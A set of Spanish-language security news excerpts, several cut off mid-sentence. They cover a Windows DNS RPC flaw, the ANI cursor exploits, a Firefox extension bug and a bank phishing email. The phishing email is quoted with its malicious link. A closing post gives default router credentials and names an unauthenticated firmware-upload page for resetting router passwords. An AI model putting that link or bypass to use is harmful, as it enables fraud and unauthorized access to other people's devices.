San Francisco (IDGNS) - Microsoft espera lanzar antes del 8 de mayo un parche para la vulnerabilidad de los servidores del Domain Name System de Windows (DNS) que esté siendo explotado por los hackers, según dijo la compañía este Martes. Microsoft ha estado bajo presión de tratar esta vulnerabilidad, divulgada la semana pasada, puesto que los hackers lo están utilizando de forma masiva en internet. El lunes, los expertos de la seguridad confirmaron que variantes del gusano de Rinbot (también llamado Nirbot por otras casa de antivirus) se han extendido por internet para explotar el defecto DNS. En cambio Microsofot señala el nivel de ataques como “no extenso.” Microsoft ha publicado un boletin para el problema, y está pesando si intensificar su respuesta y fijarla antes del 8 de mayo, la fecha de la actualización programada de las siguientes actualizaciones de la empresa. “Mientras que no tenemos una estimación segura de cuando terminaremos nuestro desarrollo y pr

Cybercrooks está utilizando un bug de seguridad todavía sin parchear en ciertas versiones de Windows para atacar a las computadoras que funcionan con estos sistemas operativos, según a advertido Microsoft este último jueves. Los hackers están atacando los sistemas de servidor del Windows 2000 y del servidor 2003 a través de un agujero en el Domain Name System, o DNS, según Microsoft ha señalado en un informe de seguridad. “Un atacante anónimo podía intentar explotar la vulnerabilidad enviando un paquete especialmente hecho a mano del RPC a un sistema afectado,” . El RPC, o el Remote Procedure Call, es un uso de los usos del protocolo de solicitar servicios de programas sobre otra computadora en una red. Windows XP y Windows Vista no están afectados por este bug del DNS. El service pack 4 del Windows 2000, el service pack 1 del servidor 2003 de Windows y el service pack 2 del servidor 2003 de Windows son vulnerables, dijo Microsoft. Compártelo

Hasta la fecha de hoy websense ha localizado más de 2000 sitios que se aprovechan de la vulnerabilidad ANI. Según la web ha habido dos ataques principales que abarcan la mayoría de estos sitios. Según websense los primeros ataques comenzaron en la región de China comprometiendo centenares de máquinas con el IFRAME, el éxito de la extensión de este ataque en esta zona fue debido a los juegos en linea, muy populares en esta zona. El segundo sistema de ataques comenzó apenas hace un par de días en Europa Oriental. Han utilizado WMF, VML,  para inyectar la vulnerabilidad en varios centenares de sitios, además de esta vulnerabilidad están añadiendo otros metodos de ataques como los keysloggers y malware. Compártelo

Todavía ocupándose de problemas con el parche de la semana pasada de la vulnerabilidad de los cursores animados .ANI, Microsoft ha fijado tres ediciones más en una actualización “prioritaria”. Microsoft publicó un parche para esta vulnerabilidad el martes 3 de abril, horas después de que el parche original fuera lanzado al público, Microsoft lanza otro parche para solucionar “varios problemas” con el parche original. Con el parche original los Pc con Microsoft Windows XP SP2, el panel de control audio de Realtek HD tenía problemas en arrancar después de que el parche fuera instalado. Los usuarios también recibieron un mensajes de errorer sobre varias DLL del sistema. Después de que este problema fuera solucionado el martes pasado, Microsoft lanzó otro parche este viernes para ocuparse de otros programas que fueron afectados en Windows XP SP2. Desde el blog oficial de Microsoft explican “otros” problemas que están teniendo los usuarios después

Un nuevo ataque mediante correo eléctronico se está detectando y se puede aprovechar de alguna vulnerabilidad de Microsoft para atacar al usuario que visite la web trampa usando iframe como los ataques en fichero ANI. El correo electrónico recibido es el siguiente: ACTUALIZADO 6-4-07: Correo electronico: ******************************************* Asunto: Estimado usuario de Online Banking ! Estimado usuario de Online Banking ! Observar por favor que a partir de el 7 de April el servicio de las en linea de actividades bancarias en Espana sera suspendido debido a un ataque vigoroso de hackers contra los Web site de los bancos espanoles mas populares (Banesto, BBVA, CajaMadrid, UniCaja etc.). Por favor tener extremo cuiddo con tus tarjetas y cuentas de credito. Para conseguir mas informacion sobre la situacion del servicio de actividades bancarias en linea de tu banco seguir por favor click en el link : http://linksysvoip.co.kr/yongsan/ Informacion de, AntiFraud.com ***************

En el día de ayer habíamos visto una demostración en la que se comprobaba que tanto Firefox como IE7 caen ante la vulnerabilidad de cursores animados que afecta a varias versiones de Windows, incluido Vista.Peor aún, veíamos que en Firefox el problema era mayor ya que no utiliza por defecto el Modo Protegido de Vista, como si lo hace IE7. De esta forma En Firefox se obtiene acceso total de escritura en el disco local, lo cual lo hace más vulnerable.El caso es que no se trata de un fallo específico de Firefox, si no de Windows Vista. El problema es que Firefox no cuenta con estos privilegios por defecto, por lo cual debemos hacer manualmente que se ejecute en modo protegido:Firefox en modo protegido en Windows VistaMicrosoft ya realizó un parche para esta vulnerabilidad, el cual pueden instalar desde el siguiente enlace:http://www.microsoft.com/technet/security/Bulletin/MS07-017.mspxDesde Mozilla recomiendan instalar el parche de Microsoft y están trabajando en el problema. De

Mientras que Microsoft está detras de un parche para solucionar la vulnerabilidad de los cursores animados (ANI), y teniendo en cuenta en los rumores de que Microsoft ya sabía de la existencia de este problema desde el 16 de diciembre del 2006, parace ser que las terceras empresas se están adelantando en buscar la solución. Una de la empresas en presentar un parche para esta vulnerabilidad ha sido eEye Digital Security que según afirman en su web ya tiene una solución completa,  además de la vulnerabilidad del ANI te protege de otras que también tienen pendiente Microsoft. Tanbién advierten que esta solución nunca podrá sustituir a las que lance Microsoft en un fúturo próximo en su web oficial. La solución de eEye consiste en no permitir la carga de los archivos .ani fuera de los límites de el %SystemRoot%. eEye ha acentuado claramente que es una solución válida porque actúa como barrera que previene la carga de iconos y de cursores animados malévolos. Para ver

Se ha encontrado vulnerabilidad (todavia no corregida) en Microsoft Windows que podría permitir que un atacante ejecute un código arbitrario. Esta vulnerabilidad es causada por Windows ya que no puede manejar correctamente archivos animados especialmente hechos a mano (ANI). Según informes públicos, esta vulnerabilidad se está explotando activamente vía Internet y son vulnerables las versiones de internet explorer 6 y 7con Windows XP sp2. Más información sobre esta vulnerabilidad se puede encontrar en: McAfee Avert Labs Blog - Unpatched Drive-By Exploit Found On The Web McAfee - Exploit-ANIfile.c TrendMicro - TROJ_ANICMOO.AX Hasta una actualización oficial, por parte de Microsoft, , US-CERT recomienda las acciones siguientes para ayudar a atenuar los riesgos de la seguridad: No navegar por páginas desconocidas y leer los correos en texto plano (no HTML). Compártelo

  La página web de ha.ckers.org reporta una nueva vulnerabilidad en la extensión Firefox Fizzle, un lector de noticias RSS. Debido a que convierte entidades HTML en otras más peligrosas, la extensión permite robar ficheros y otras actividades de malware. Al parecer la validación de errores cuando se procesan las RSS, permite también ejecutar código HTML en el contexto local. La versión afectada es la 0.5, aunque otras versiones pueden tener el mismo problema. Mientras tanto, la popular página oficial de extensiones para Firefox retira la página de dicha extensión para evitar nuevas instalaciones. Compártelo

Si te encuentras dentro de una red LAN , puedes entrar al router y podes abrir puertos, denegar acceso a determinados ordenadores, hasta puedes tener el control total, puedes entrar a la configuracion del router con solo escribir la direccion ip : 192.168.1.1 o ip: 192.168.0.1 en la ventana de tu navegador alli te saldra una pequeña ventana de logeo donde te pide que ingreses nombre de usuario y contraseña, por lo general y simpre viene de fabrica el usuario : ADMIN contraseña: 1234 , ahora si cambiaron estos parametros ? que puedes hacer? hay una solucion que encontre navegando por internet y quiero compartirlo con uds. bueno les cuento que este modelo y tambien con otros modelos de router de este fabricante tiene una vulnerabilidad el cual salta la proteccion de user y password haciendo posible su reseteo total, explotando este bug un atacante puede resetear el password del router, La vulnerabilidad consiste en que el archivo “rpFWUpload.html” no tiene password